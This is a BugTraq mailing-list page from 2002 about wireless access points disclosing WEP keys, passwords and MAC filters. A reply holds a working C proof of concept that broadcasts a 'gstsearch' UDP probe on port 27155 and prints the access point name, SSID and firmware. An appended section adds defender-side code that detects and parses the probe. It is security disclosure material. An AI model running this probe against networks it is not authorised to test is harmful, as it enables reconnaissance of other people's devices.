BugTraq
Accesspoints disclose wep keys, password and mac filter (fwd) Nov 03 2002 01:43PM Tom Knienieder (knienieder khamsin ch) (5 replies)
Re: Accesspoints disclose wep keys, password and mac filter (fwd) Nov 05 2002 09:44AM Hakan Carlsson (hockey easylogic se)
Re: Accesspoints disclose wep keys, password and mac filter (fwd) Nov 04 2002 10:09PM Tollef Fog Heen (tollef add no)
Re: Accesspoints disclose wep keys, password and mac filter (fwd) Nov 04 2002 07:16PM Frank Louwers (frank student rug ac be)
Re: Accesspoints disclose wep keys, password and mac filter (fwd) Nov 04 2002 05:17PM Cliff Albert (cliff oisec net)

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name, SSID and firmware version. Except for firmware
version, those are not private information.

Quickly patched proof of concept:

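#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Reply layout used to decode the answer */
typedef struct {
    char type[28];
    char blank1[8];
    char apname[32];
    char firmware[6];
    char blank2[11];
    char ssid[32];
} __attribute__ ((packed)) answer;

int main(void)
{
    char rcvbuffer[1024];
    struct sockaddr_in sin;
    answer *ans = (answer *)rcvbuffer;
    int sd, val;
    ssize_t ret;

    /* Zero the buffer so a short reply leaves the unused fields empty */
    memset(rcvbuffer, 0, sizeof(rcvbuffer));
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("255.255.255.255");
    sin.sin_port = htons(27155);

    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd < 0)
    {
        perror("socket");
        exit(1);
    }

    /* Broadcast has to be enabled explicitly on the socket */
    val = 1;
    ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
    if (ret < 0)
    {
        perror("setsockopt");
        exit(1);
    }

    ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (ret < 0)
    {
        perror("sendto");
        exit(1);
    }

    ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
    if (ret > 0)
    {
        /* Fields are fixed-width and may lack a terminating NUL: bound each print */
        printf("Type : %.*s\n", (int)sizeof(ans->type), ans->type);
        printf("Announced Name : %.*s\n", (int)sizeof(ans->apname), ans->apname);
        printf("Firmware version : %.*s\n", (int)sizeof(ans->firmware), ans->firmware);
        printf("SSID : %.*s\n", (int)sizeof(ans->ssid), ans->ssid);
    }
    else
        perror("read");

    close(sd);
    return 0;
}
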
thomas
>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
>
>
>
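Added example, not part of the original post: defender-side C that recognises the discovery probe in captured UDP traffic and decodes a reply with the field layout from the struct in the post, using bounded copies and masking non-printable bytes before they reach a log. The names gst_is_probe, gst_parse_reply and struct gst_reply are hypothetical, the sample packet is constructed, and treating 117 bytes as the minimum reply length is an assumption drawn from that struct.

```c
#include <stdio.h>
#include <string.h>
#define GST_PORT  27155        /* UDP port the PoC sends to */
#define GST_PROBE "gstsearch"  /* probe payload the PoC sends */
/* Offsets and sizes taken from the packed struct in the PoC. */
enum { OFF_TYPE = 0, LEN_TYPE = 28, OFF_NAME = 36, LEN_NAME = 32,
       OFF_FW = 68, LEN_FW = 6, OFF_SSID = 85, LEN_SSID = 32, REPLY_LEN = 117 };
struct gst_reply {             /* hypothetical name; NUL-terminated copies */
    char type[LEN_TYPE + 1], apname[LEN_NAME + 1];
    char firmware[LEN_FW + 1], ssid[LEN_SSID + 1];
};

/* 1 if a captured UDP datagram looks like the discovery probe. */
int gst_is_probe(unsigned dst_port, const unsigned char *p, size_t len)
{
    size_t n = sizeof(GST_PROBE) - 1;
    return dst_port == GST_PORT && len >= n && memcmp(p, GST_PROBE, n) == 0;
}

/* Bounded copy: stops at NUL or n bytes, masks non-printable bytes. */
static void copy_field(char *dst, const unsigned char *src, size_t n)
{
    size_t i;
    for (i = 0; i < n && src[i] != '\0'; i++)
        dst[i] = (src[i] >= 0x20 && src[i] < 0x7f) ? (char)src[i] : '?';
    dst[i] = '\0';
}

/* 0 on success, -1 if the datagram is shorter than the layout. */
int gst_parse_reply(const unsigned char *p, size_t len, struct gst_reply *out)
{
    if (len < REPLY_LEN) return -1;
    copy_field(out->type, p + OFF_TYPE, LEN_TYPE);
    copy_field(out->apname, p + OFF_NAME, LEN_NAME);
    copy_field(out->firmware, p + OFF_FW, LEN_FW);
    copy_field(out->ssid, p + OFF_SSID, LEN_SSID);
    return 0;
}

int main(void)
{
    unsigned char pkt[REPLY_LEN] = {0};     /* constructed sample reply */
    struct gst_reply r;
    memcpy(pkt + OFF_NAME, "lab-ap", 6);
    memset(pkt + OFF_SSID, 'A', LEN_SSID);  /* full-width field, no NUL */
    if (gst_parse_reply(pkt, sizeof(pkt), &r) == 0)
        printf("name=%s ssid=%s\n", r.apname, r.ssid);
    return gst_is_probe(GST_PORT, (const unsigned char *)"gstsearch", 9) ? 0 : 1;
}
```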